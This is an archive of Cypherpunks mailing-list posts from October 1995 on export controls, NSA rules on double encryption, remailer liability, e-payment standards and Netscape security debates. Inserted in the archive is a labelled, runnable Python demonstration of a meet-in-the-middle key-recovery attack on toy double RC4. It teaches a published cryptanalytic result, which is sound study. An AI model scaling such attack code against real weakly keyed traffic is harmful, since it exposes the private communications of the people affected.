Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Uzi security Marxist NSA ammunition NORAD FSF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Thu, 19 Oct 95 17:45:59 PDT
To: cypherpunks@toad.com
Subject: How was the Federal thing?
Message-ID: <199510191746.RAA11564@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Can someone please offer a summary of the
Federal Courthouse thing?

Love Always,

Carol Anne...now hooked on "Court Cypherpunk"
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIbw3IrpjEWs1wBlAQGbnwQAjzxulfm3DEporCzZic9Jb6Isq1Jvx8yU
M0y/e7npkNc+lVJ5M+aieFiGBormWsiYvAzGBqhK4H9OXs2J+HQX5sDs4LO9jqLj
52x5yc8djJN1opMdmi9g+V5/A8MzpBz32v9QzbRrZAAcRwWf9r9BK9edfvlhWqko
fZk8kv1F+8s=
=CrJS
-----END PGP SIGNATURE-----
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@quito.CS.Berkeley.EDU (David A Wagner)
Date: Thu, 19 Oct 95 17:25:14 PDT
To: cypherpunks@toad.com
Subject: Re: The NSA Visits Compendium
Message-ID: <199510200023.UAA03295@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.SOL.3.91.951017102059.25411F-100000@eagle.nexor.co.uk>,
Andy Brown <asb@nexor.co.uk> wrote:
> On Mon, 16 Oct 1995, Peter Wayner wrote:
> 
> > [...]
> > The most interesting thing that he mentioned was that the company had to 
> > guarantee that the data would never be encrypted sequentially by two 
> > _different_ algorithms. Apparently double encryption by 40-bit RC-4 was 
> > okay, but using different algorithms was verboten.
> 
> Very interesting indeed.  With RC4 the bulk of the time is in key setup, 
> so if they could do two setups in parallel then the total time to search 
> a double-encrypted 40 bit keyspace would not be that great.
> 

Hold on -- was the NSA rep talking about double encryption
*with two different independent keys*, or talking about double
encryption with the same key?

Somehow I doubt the latter: for starters, double encryption
with the same key with a stream cipher is generally a Bad Idea.
(Remember Robert Morris's suggestion to ``always look for
plaintext?'') <grin>

In any event, double encryption with the same key is never
gonna be much more secure than single encryption, because it
doesn't increase the key space.


But if the NSA rep was allowing RC4 double encryption *with
two different independent secret keys*, then this *is* interesting!
There are well-known meet-in-the-middle attacks on double
encryption (with independent keys); but the standard one
requires lots of storage (2^40 storage -- this can't be
precomputed if you use 88 extra non-secret salt bits in the
key like SSL); a less well-known more recent attack doesn't
need the storage, but takes a bit longer (probably a few
hundred times longer) than brute force search of single
encryption.  van Oorschot & Wiener have a paper on this subject.

So did you use a SSL-like construction with lots of non-secret
salt bits in the key?

If not, then the 2^40 bytes of storage could be precomputed,
and I'd guess that this NSA position might mean that the NSA
has some Exabytes full of precomputed RC4 output for all possible
40 bit keys. :-)

Curious,
Dave Wagner
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBEAwUBMIbr9SoZzwIn1bdtAQGWOAF0DdBaTogLiH0QDSxjAI8iGeiXFLnPg8pT
2H0cv6rcSSo+23lqB3zZw3UP4uHGeZk=
=3KwF
-----END PGP SIGNATURE-----
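
Added example (not part of the message above, and not code from anyone on the list): a toy Python run of the standard meet-in-the-middle attack that message describes, against double RC4 with two independent keys. The 10-bit secrets, 2-byte key encoding, salts and sample plaintext are constructed assumptions chosen so it runs in seconds; it also shows the same-key case cancelling out and a table built under one non-secret salt failing against a message that used another.

```python
"""Toy meet-in-the-middle on double RC4 (illustrative sizes, constructed data)."""

SECRET_BITS = 10   # assumption: stands in for the 40 secret bits of export RC4
PREFIX = 8         # bytes of known plaintext used to match keystreams


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Standard RC4: key schedule, then n bytes of output."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def full_key(secret: int, salt: bytes) -> bytes:
    """Secret bits followed by non-secret salt (SSL-export-like layout, assumed)."""
    return secret.to_bytes(2, "big") + salt


def double_encrypt(plaintext: bytes, k1: int, k2: int, salt: bytes = b"") -> bytes:
    """Encrypt with RC4 under k1, then again under k2."""
    ks1 = rc4_keystream(full_key(k1, salt), len(plaintext))
    ks2 = rc4_keystream(full_key(k2, salt), len(plaintext))
    return xor(xor(plaintext, ks1), ks2)


def build_table(salt: bytes = b"") -> dict:
    """Keystream prefix -> secret, for every possible secret: 2^n storage."""
    return {rc4_keystream(full_key(k, salt), PREFIX): k
            for k in range(1 << SECRET_BITS)}


def recover(known_plain: bytes, ciphertext: bytes, table: dict,
            salt: bytes = b"") -> set:
    """Return candidate key pairs using about 2^n more key setups.

    P xor C equals KS(k1) xor KS(k2), so for each guess of k2 we look up
    (P xor C) xor KS(k2) in the table of KS(k1) values. XOR commutes, so
    the two keys are reported as an unordered (sorted) pair.
    """
    target = xor(known_plain[:PREFIX], ciphertext[:PREFIX])
    found = set()
    for k2 in range(1 << SECRET_BITS):
        ks2 = rc4_keystream(full_key(k2, salt), PREFIX)
        k1 = table.get(xor(target, ks2))
        if k1 is not None:
            found.add(tuple(sorted((k1, k2))))
    return found


if __name__ == "__main__":
    msg = b"constructed known plaintext, at least 8 bytes"

    # Same key twice with a stream cipher: the keystreams cancel.
    print("same key gives plaintext:", double_encrypt(msg, 77, 77) == msg)

    # No salt: one table, built once, serves every intercepted message.
    table = build_table()
    print(recover(msg, double_encrypt(msg, 341, 675), table))
    print(recover(msg, double_encrypt(msg, 1, 1023), table))

    # Per-message non-secret salt: a table built under another salt is useless,
    # so the 2^n table has to be rebuilt for each message.
    salt_a, salt_b = bytes(range(11)), bytes(range(100, 111))
    c = double_encrypt(msg, 341, 675, salt_b)
    print("stale table:", recover(msg, c, build_table(salt_a), salt_b))
    print("fresh table:", recover(msg, c, build_table(salt_b), salt_b))

    n = SECRET_BITS
    print("key setups: meet-in-the-middle", 2 * 2**n, "vs naive", 2**(2 * n))
```
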




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Thu, 19 Oct 95 12:55:47 PDT
To: cypherpunks@toad.com
Subject: Re: crypto export from the UK
In-Reply-To: <4843.9510191407@misun2.mi.leeds.ac.uk>
Message-ID: <Pine.HPP.3.91.951019203347.12052A@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 19 Oct 1995 jbaber@mi.leeds.ac.uk wrote:

> I believe that the laws regarding the export of crypto from the UK are
> very similar to the ITAR regs in the US. However our Government seems

According to the well researched list of various countries' crypto-laws
that Bert-Jaap Koops published on this list last July, the UK does not
have any laws against export of crypto. Here are some excerpts.

Mats

*****************************************************************

CRYPTO LAW SURVEY
Version July 1995
Bert-Jaap Koops (koops@kub.nl)
Please credit if quoting.

.................................<snip>   

----------------------------------------------------------------
SURVEY PER COUNTRY
1. Export/ import regulations
2. Other laws/regulations pertaining to encryption
3. Threats/ intentions to regulate encryption
4. Regulations stimulating encryption use
   
----------------------------------------------------------------
    
_COCOM_
1. COCOM (Coordinating Committee for Multilateral Export Controls)
is an international organization (Japan, Australia, and all NATO
members, Ireland excluded) for the mutual control (and restriction) of
strategic arms export. It maintains, among others, the International
Industrial List and the International Munitions List. In 1991, COCOM
has decided to allow export of mass-market cryptographic software
(including public domain software). Some member countries of COCOM
follow its regulations, but others, such as Germany and the
United States, maintain separate regulations.

.............................<snip>   

_United Kingdom_
1. COCOM regulations.
2.  no
3.  In its policy on the information superhighway, Labour states it does
not approve of escrowed encryption, but it wishes authorities to have the
power to demand decryption under judicial warrant.  It seems, then, that
Labour intends to penalize a refusal to comply with a demand to decrypt
under judicial warrant.
    
.............................<snip>

END




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lyalc@ozemail.com.au (lyal collins)
Date: Thu, 19 Oct 95 06:48:16 PDT
To: cypherpunks@toad.com
Subject: STT - useable in real life ?
Message-ID: <199510191347.XAA17540@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


From reading the STT specs, a 'credential' is made up of typically 4
certificates - root, country CA, issuer CA, and cardholder/merchant.
Two certificates are based upon 1024 bit public keys, 1 (root) is 2048
while the cardholder PK is 512/768 bit.
I believe a decrypt operation is required to verify each certificate.
I have seen test results from a local crypto company which indicate a 1024
bit decrypt operation will take between 2.5-30 seconds (Pentium 90 - 386/33
- I am trying to relate this to userland, not the well equipped cybernaut).
PK encrypt is somewhat faster. 
On this basis, a credential verify will take 10+ seconds up to several
minutes, on this range of equipment.
This seems to take a significant amount of time in verifying certificates.
This situation will only get worse as renewal certificates are appended to
existing certificates.
Can someone comment, or steer me in the right direction if I have
misunderstood certificate verification ?
Working for a bank who may have to use this one day, customer impact is a
big deal - we can afford specialised  hardware, but not all our customers can.
thanks for any clarification,
 lyal
All mistakes in this message belong to me - you should not use them!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Thu, 19 Oct 95 13:19:45 PDT
To: frenchie@magus.dgsys.com
Subject: Re: Motherload of Crypto Site...
In-Reply-To: <m0t5ftL-000xhiC@magus>
Message-ID: <199510192150.XAA00927@soikko.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


There are a lot of cryptographic software packages available outside
the United States.  The International Crypto WWW Pages at
http://www.cs.hut.fi/crypto contain a large index of available
packages and algorithms.

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 20 Oct 95 00:59:29 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: 50 attacks on Netscape - please send the check
In-Reply-To: <9510182213.AA05709@all.net>
Message-ID: <199510182359.TAA16554@clark.net>
MIME-Version: 1.0
Content-Type: text/plain




   That would have been a fine piece of work except that Java cannot
take complete control of Netscape. It can't replace the toolbar
buttons, it can't override default protocol handlers like http, etc.
The open location button, as far as I can tell, does not have Java
hooks and will always function as it is supposed to, by stopping
all running Java threads, and going to  a new page.


-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 19 Oct 95 18:49:03 PDT
To: cypherpunks@toad.com
Subject: PARTY! Nov. 18th, sponsored by Community ConneXion
Message-ID: <199510200143.SAA24338@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



(Apologies if you receive this multiple times)

Mark your calendars...

	Community ConneXion: the Internet Privacy Provider is having a
party! We're partying to celebrate the spread of privacy on the net,
through the increased security of internet products, as well as the
growth of our services. (Many new services and new features on existing
services will likely be announced before the party. Stay tuned.)
	We're inviting all our customers and other potentially
interested parties, which includes you, if you've received this
note. So please join us, and send a copy of this invitation to anyone
else you may know who would be interested in attending.

Where: Icon Byte Bar & Grill
       299 9th Street (at Folsom)
       SF CA 94103
When:  Sat. Nov. 18 1995
       7:00 PM

	This is a good chance to meet and network with the people who
are making privacy on the internet a reality. Find out more about the
HackNetscape and HackMicrosoft contests. Learn about our specialized
web services, found nowhere else but at Community ConneXion. Hear
about the anonymous and pseudonymous servers here and what we're doing
to improve them.
	There will be catered snacks and a no-host bar.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Thu, 19 Oct 95 18:45:26 PDT
To: cypherpunks@toad.com
Subject: Ginetta Sagan to give Jing Lyman Lecture at Stanford
Message-ID: <v02110100acacaefbbafb@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


My apologies for cross posting this but she is really  a great speaker...


Todd



>Date: Thu, 19 Oct 1995 17:38:43 -0700 (PDT)
>From: Samson Tu <tu@camis.stanford.edu>
>Sender: Samson Tu <tu@camis.stanford.edu>
>Subject: Ginetta Sagan to give Jing Lyman Lecture at Stanford
>To: aiusancal@camis.stanford.edu, aiusagr19@camis.stanford.edu,
>        amnesty@lists.Stanford.EDU
>MIME-Version: 1.0
>
>Jing Lyman Lecture on Visionary Women
>
>Women in the Resistance During World War II and After
>
>               Ginetta Sagan
>Honorable Chair, Amnesty International USA Board of Directors
>
>Time: Noon-1pm, Wednesday October 25
>Place: Oak East, Tresidder Union
>       Stanford University Campus, Stanford
>Sponsored by: Institute for Research on Women and Gender
>
>end official announcement and begin personal plug:
>
>For those of you who don't know, Ginetta Sagan, a participant in the Italian
>Resistance during the WW II, is the godmother of Amnesty activities in the Bay
>area and beyond. She is a spunky, dynamic woman, and a great storyteller. Even
>though the title of the talk is about the past, she promises to mention
>Amnesty's current concerns. When I last talked to her, she was on the phone
>with the IS researcher on Algeria, getting the latest scoop. I especially urge
>Stanford Amnesty members to come and see a local celebrity and a great human
>rights activist. (Her husband, Dr. Sagan, is a consulting professor at
>Stanford.)
>

Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd@lgt.com

(415) 324-4318


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a
XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0
0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y
=bTYb
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Veeneman <system@decode.com>
Date: Thu, 19 Oct 95 18:01:42 PDT
To: cypherpunks@toad.com
Subject: Re: airport security
Message-ID: <yPV9cD1w165w@decode.com>
MIME-Version: 1.0
Content-Type: text/plain


"Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu> writes:

>    Without actually agreeing with the FAA, the reason you can't have a name
>    other than your own on your ticket, as well as why you are required to
>    be in your assigned seat on take-off and landing is because if there is 
>    a plane crash, they need to be able to identify an otherwise difficult
>    to identify body.

This is *not* how crash victim identification is done.  The FAR requirement
is only that passengers be _seated_ during takeoff and landing, not that
they be seated "where they're supposed to be."

In fact, many airlines do not assign seats at all.  First come first serve
for airlines like Southwest, ValuJet, Western Pacific, etc.

Actual victim identification varies from mundane (do they have a wallet
on their person, etc.) to rather more grisly methods.


>                                  Sorry about this,

Don't be sorry.

>                                       Bob

Dan


--
system@decode.com (Dan Veeneman)
Cryptography, Security, Privacy BBS  +1 410 730 6734   Data/FAX




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdavidm@iconz.co.nz (David Murray)
Date: Fri, 20 Oct 95 16:07:33 PDT
To: cypherpunks@toad.com
Subject: Re: transaction costs in anonymous markets
In-Reply-To: <Pine.3.89.9510180711.B37215-0100000@aix2.uottawa.ca>
Message-ID: <pnr898152169i@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In message <Pine.3.89.9510180711.B37215-0100000@aix2.uottawa.ca>, s1018954@aix2.uottawa.ca said:
> On Wed, 18 Oct 1995, David Murray wrote:
> 
> > B. Unilateral Anonymity. One party to the transaction is known, but the other
> > is unknowable. An example might be subscribing for a digital security with
> > ecash - the issuer is known, but the purchaser is anonymous.
> > 
> > C. Bilateral Anonymity. The identities of both parties to the transaction
> > are unknowable. This might be the case on a cypherpunk stock exchange...
> Or we could use the client/server terminology when possible.

I was actually vaguely referring to contract theory - unilateral and bilateral
executory contracts.

And this is where this discussion folds into Bob Hettinga's point about
non-repudiation. How can an anonymous party credibly bind its future actions?

One way is to hide the identity of the human/actor making the promise/contract
but leave their assets where the other party (the promisee) can get to them if
the anonymous party defaults. (The reputation of a pseudonym is an interesting
version of this.) A pledge of digital securities is a possibility; some sort
of protected pool of assets is another.

A lot of transactions/contracts only involve one party making a promise that
they have to perform in the future. When I get on a bus, once I've paid the
fare, only the bus company still has to perform its half of the contract
(although, as something of a complicating factor, I could still _breach_
the contract). This is why I used the subscription for a security as an
example - once I've paid my ecash, it's only the issuer that has to make
the coupon payments and redeem the security in the future - the contract is
unilaterally executory, with the known party still to perform.

But a lot of contracts involve performance over time by _both_ parties - they
are bilaterally executory. It would seem that, to be effective, both of the
parties (or at least sufficient of their assets) must be known.

So, unilateral/bilateral anonymity is kind of the complement of unilateral/
bilateral executoriness.

Perhaps client/server terminology is better.

[And before someone points it out - a lot of these issues have been explored
centuries ago, and the answers led to commercial innovations like bills of
exchange, bills of sale, bills of lading etc. I plan to spend more time
learning from legal history in the hope we are destined to repeat it...]

Whatever.

Dm.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIYWxVlo3j8JHzalAQFgJQQAndaHZT4pUsx2WojXsMaiI7cBblyDE2S6
v8b74NzuGxZpDsUjtQFTuqhbIbqPjpLuIxn7c0DjNAPoa0w3LwCOvtjUkDh4HiKj
UnlXu61I6Tf3KKUr4GmBadWmADdzfnPPXl7HFHr0GfH7a17ET97CVJzoYQTYl5xu
rI3y3gYe8e8=
=QDQf
-----END PGP SIGNATURE-----

[Palmtop News Reader - Beta Version 3]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 19 Oct 95 23:22:26 PDT
To: cypherpunks@toad.com
Subject: Don't Kill the Messenger--A New Slant on Remailers
Message-ID: <acac7cd8430210046e54@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(I was out of town most of the past few days, when the debate about this
"Modest Proposal" happened. In reading the messages in the thread, I see a
lot of the issues mentioned that we talked about several years ago--not that
this is a sin to talk about issues more than once--and that led to the
creation of "message pools" and groups like "alt.anonymous.messages". But
some new ideas are emerging. And I have a new idea for a remailer, so this
is turning out to be a fruitful topic! Too bad the topic has already died,
apparently.)

At 4:36 PM 10/18/95, Hal wrote:
>Eli Brandt <eli@UX3.SP.CS.CMU.EDU> writes:
>
>>If you
>>split the message into shadows, you avoid having anyone in this
>>position.
>
>I think splitting the message would be OK, but then the question is who
>is responsible for reassembling it?  If there were a "reassembly
>server" which took such messages, assembled them, and forwarded them,
>then we would be right back where we started from.  If the end user is
>responsible for reassembly, then that is tantamount to voluntarily
>agreeing to receive anonymous messages, and that is no problem.  The
>complaints we get are virtually 100% from people who didn't want to
>receive such messages, or see them posted.  And of course anonymous news
>postings via shadows would also have the reassembly problem.

Hal succinctly describes the conceptual flaws in many of these schemes to
replace the "last remailer" with something else: it usually turns out that
such replacements either don't work (forging headers) or merely shift the
problem to another agent.

The most practical short term approach is for any remailer operator feeling
some heat to do what Hal does with his Caltech remailer: remail to a site
less likely to cause problems. For example, bounce all messages through a
Netherlands remailer. (Even if the NL remailers are ultimately shut down,
using them accomplishes the practical purpose of removing the heat from
one's self...of course, they might feel the same way and lob the message
back to U.S. remailers!)

(Leading to the "Dining Buck Passers Problem," where a message never gets
delivered because all remailers are passing the buck by lobbing the message
to other remailers...."Charlie on the MTA.")


THE ROLE OF THE "MESSENGER"

But I think I have a longer term solution, one that involves a change in
thinking about the differences between the _originator_ of a message and
the mere _messenger_.

The notion is to much more explicitly separate the functions of the
"messenger" or "deliverer" from the "originator" or "sender." Granted, this
is already done in the sense that a piece of e-mail goes through many
hands. For example, Hal's message that I am responding to here has this in
the header blocks, showing some of the "couriers" or "messengers":

Return-Path: owner-cypherpunks@toad.com
Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by you.got.net
(8.6.9/8.6.9) with ESMTP id KAA08536 for <tcmay@got.net>; Wed, 18 Oct 1995
10:47:24 -0700
Received: from toad.com by relay3.UU.NET with SMTP
        id QQzlzw04926; Wed, 18 Oct 1995 13:06:48 -0400
Received: by toad.com id AA06207; Wed, 18 Oct 95 09:38:06 PDT
Received: from nova.unix.portal.com by toad.com id AA06198; Wed, 18 Oct 95
09:38:02 PDT
Received: from jobe.shell.portal.com (jobe.shell.portal.com [156.151.3.4])
by nova.unix.portal.com (8.6.11/8.6.5) with ESMTP id JAA01733 for
<cypherpunks@toad.com>; Wed, 18 Oct 1995 09:36:59 -0700
Received: (hfinney@localhost) by jobe.shell.portal.com (8.6.11/8.6.5) id
JAA17879; Wed, 18 Oct 1995 09:36:58 -0700
Date: Wed, 18 Oct 1995 09:36:58 -0700
From: Hal <hfinney@shell.portal.com>

Now, by convention, we don't treat the _intermediate_ steps in the same way
that we treat the "From: Hal <hfinney@shell.portal.com>" step. So, why do
many treat _remailers_ as originators?

Mostly, it's education. People get a message from "remailer@kremvax.org"
and they are trained to think this is the sender. Or, they are trained to
think they can send a message back to this site, or to "root@kremvax.org"
complaining about the mail they received and expecting that something will
be done to make it stop. But trying to educate people that a remailer is
not the same as a sender is likely to be a long and disappointing process.
A better approach is needed.

I believe that by changing the nature of remailers and making them much
more explicitly like messengers, couriers, and delivery services, that we
can win the public relations battle. There may still be legal challenges,
but at least the semantics will not be so confusing. Just as Willis Ware
made the point to Michael Froomkin about the confusing and misleading
semantics of "escrow," I believe the same is true of the confusing and
misleading semantics of "remailer." Perhaps we should just change the name
from "remailer" (or "mix") to "Message Delivery Services." Perhaps some of
you can think of a shorter and catchier term that still makes the messenger
role clear.


(I hang out on the Cyberial mailing list for cyberspace law discussions, so
I am well aware that any change such as I am suggesting must also be tested
as a legal strategy, and that conceptual ideas may not hold water, legally.
I won't address legal issues here, at least not now.)

The idea is to make it much more explicit that a remailer is merely
_delivering_ a message. Few people hold their local postal carrier
responsible for delivering a letter containing "bad material," be they
threats, hate speech, unwanted pornography, etc. Likewise, package delivery
services are generally not held responsible. And telephone answering
services are not treated as the authors of, say, threatening messages, when
they pass on messages such as:

"Tim, you received a call at 4:15 p.m. saying that if you continue with your
project to collect reports of NSA visits to software companies that some
guys dressed in blue suits will try to run you down in your parking lot."

In these cases, we don't kill the messenger. We don't even sanction the
messenger. And it's more than just that we treat the messenger as being
ignorant of the contents, as the telephone message service example shows:
there are several examples I can think of immediately in which harmful or
hateful speech is relayed to someone with no expectation that the relayer
will face sanctions.

This is much more than the oft-cited doctrine of "common carrier" status,
where the government (it is claimed) grants to the phone company certain
rights and responsibilities with the proviso that it will not hold them
liable for the _content_ of phone calls. (I'm not sure if Federal Express
is treated as a "common carrier," but I'm fairly certain they are not held
liable for various evils delivered in sealed packages, with certain obvious
exceptions involving cooperation with law enforcement.)

I'm not a lawyer, but I believe the law recognizes (and has for a long
time) that the messenger of bad or harmful news, or mail, etc., is not to
be held liable. There are oft-debated examples involving a newspaper
editor's responsibility not to "relay" libelous material, and so forth, but
these are not cases of mere couriers or messengers.

(Counterpoint: And yet couriers who knowingly transport drugs of course
face sanctions. This is a case where the possession (and hence transport)
itself is illegal. This involves scienter--awareness--of what is being
transported, in a way that delivery of an encrypted message clearly could
not. Or even unencrypted messages, if the messenger could make a plausible
claim that he does not look at or screen messages. Lots of issues to
discuss.)


A MAIL DELIVERY SERVICE (don't we already have them? yes, but....)

So, how would this work?

With remailers, even more steps need to be taken to make it absolutely
clear that the delivered message is not _from_ the last Internet site that
shows up in the "From:" field. More than just disclaimers are needed.

One approach is for a _notification-based_ system. To wit:

"You have a piece of mail awaiting at our mail delivery service. The
originator is unknown. The title of the message is "Tentacles of Medusa
Must Die!" You may retrieve this message by replying to this notification
with the word "Yes" anywhere in the Subject field. This message will be
kept for 60 days and then deleted."

The idea being to more carefully distinguish between mere messengers and
the "From:" field (not that "From:" establishes origin, as we all know from
the whole point of remailers, but most people associate "From:" with an
actual originator, wherein lies the problem).

It would also lessen complaints from people who suddenly find unwanted mail
arriving anonymously. People would have to make at least some token effort
to "accept delivery."

Similarities to "general delivery" mail delivery are obvious, as are
similarities to fee-based mail forwarding services and "Mailboxes Etc."
services.

(By the way, and not to digress again, but I see systems like this as the
likely future of mail. Some scheme where a user chooses to accept or reject
delivery--as with packages delivered which one can refuse delivery on--is
needed to solve several problems: mailbombs, unwanted illegal material
arriving, the sheer flood of mail, etc. And with people moving around,
changing companies, wanting anonymity, etc., such mail service sites will
be a natural fit. Having them add filtering services, a la MailWeir, is one
obvious service.)

This could be implemented as a new type of remailer. This could also
integrate with paid delivery systems, a la digital postage. (I can imagine
some people demanding to be paid some small amount to receive a
message....this is not feasible with the current "free delivery" model, but
a lot of things are not possible with "free delivery." But I digress.)

I'll quit for now. Lots of issues.

"Don't kill the messenger."


--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 19 Oct 95 21:16:20 PDT
To: cypherpunks@toad.com
Subject: ANSI to work on e-payment -- first meeting coming up
Message-ID: <9510200413.AA17440@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain



First Meeting of Electronic Commerce Work Group
November 29, Washington, DC

ANSI Accredited Standards Committee X9 - Financial Services - in 
response to the explosion of payment transaction proposals for the 
internet, has approved a new work item to develop a single secure 
electronic payment syntax.  The first meeting of the Electronic Commerce 
Work Group will be Wednesday, November 29 from 9:00am till 5:00pm at the 
American Bankers Association, 1120 Connecticut Ave, NW, Washington, DC 
20036.

Agenda

Review of Scope of Work
Consideration of Federal Reserve Request to expand scope to Bank-Bank 
messages
Presentation from Industry groups with existing payment protocols
Assignment of work items
New items
Next meetings  (Jan/Feb. - San Francisco, May - Boston??)

A draft scope:

The payment syntax described in this standard is designed to order a 
financial institution to make payment to a merchant from an account of a 
purchaser based on the near term delivery of low monetary value goods or 
services.  It will be possible to include this payment order in any 
electronic protocol that is based on communications between the 
purchaser and the merchant, and between the merchant and a financial 
institution.  This standard does not describe, nor recommend, any 
particular communications protocol.

When used within a complete payment infrastructure, the secure payment 
order described shall offer privacy and integrity of the purchaser's 
payment information, and shall prevent the purchaser from successfully 
repudiating the sending, or the merchant from successfully repudiating 
the receiving, of a valid payment order.  Thus the financial institution 
can be sure that its customer requested the payment and that the 
merchant can be accurately identified on the account statement.

About ASC X9

ASC X9 is the accredited standards developer which brings together 
banks, securities trading companies, equipment and software 
manufactures, associations and others in the financial services industry 
to develop voluntary nationally accepted standards based on industry 
consensus.  Founded in 1976, ASC X9 was accredited by the American 
National Standards institute in 1984.  The American Bankers Association 
serves as X9 Secretariat.  For more information on X9, contact the 
secretariat at 202/663-5300, for more information on the Electronic 
Commerce Work Group, contact its chair, Tom Jones at 602/554-3569.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@pdcorp.com (Dan Weinstein)
Date: Thu, 19 Oct 95 22:20:20 PDT
To: anonymous-remailer@shell.portal.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510191722.KAA06757@jobe.shell.portal.com>
Message-ID: <199510200517.WAA15755@email.pdcorp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 19 Oct 1995 10:22:40 -0700, Alice de 'nonymous wrote:


>From the "Orange Book", one of the volumes of the Department of Defence's
>"Rainbow Series" more commonly known as TCSEC (Trusted Computer System
>Evaluation Criteria) and available from: 
>
> U.S. Government Printing Office         INFOSEC Awareness Office
> Superintendent of Documents     - or -  National Computer Security Centre
> Washington, DC 20402	                 9800 Savage Road	
>                                         Fort George G. Meade, MD  20755-6000
>
>which stipulates that:
>
>      "... it is required that ADP (Automated Data Processing) systems
>       that "process, store, or use classified data and produce 
>       classified information will, with reasonable dependability, prevent:
>
>        a. Deliberate or inadvertent access to classified material by
>           unauthorized persons, and
>
>        b. Unauthorized manipulation of the computer and its associated 
>           peripheral devices."
>

I used to work in ADP security for the U.S. Navy and can tell you that
at least the Navy's requirements also include the machine's physical
security and the networks that these machines may be connected to.  In
fact I believe that Secret information can only be stored on a machine
in a vault or on removable media.  These are not things that the average
individual is going to do with their computer.  Netscape only attempts
to secure the information being transferred from a trusted client and
a trusted server.  I have yet to see Netscape claiming that if you
install their software on your machine that you will never again
suffer from data loss.  Your expectations are ridiculous, Netscape
cannot be held responsible for the end user not properly configuring
their machine.  Please stop wasting everyone's time with your
ridiculous rants.  If you must continue to post your idiocy stop using
an anonymous remailer so that the rest of us who want to use this
mailing list for intelligent discussion can kill file you.



Dan Weinstein
djw@pdcorp.com
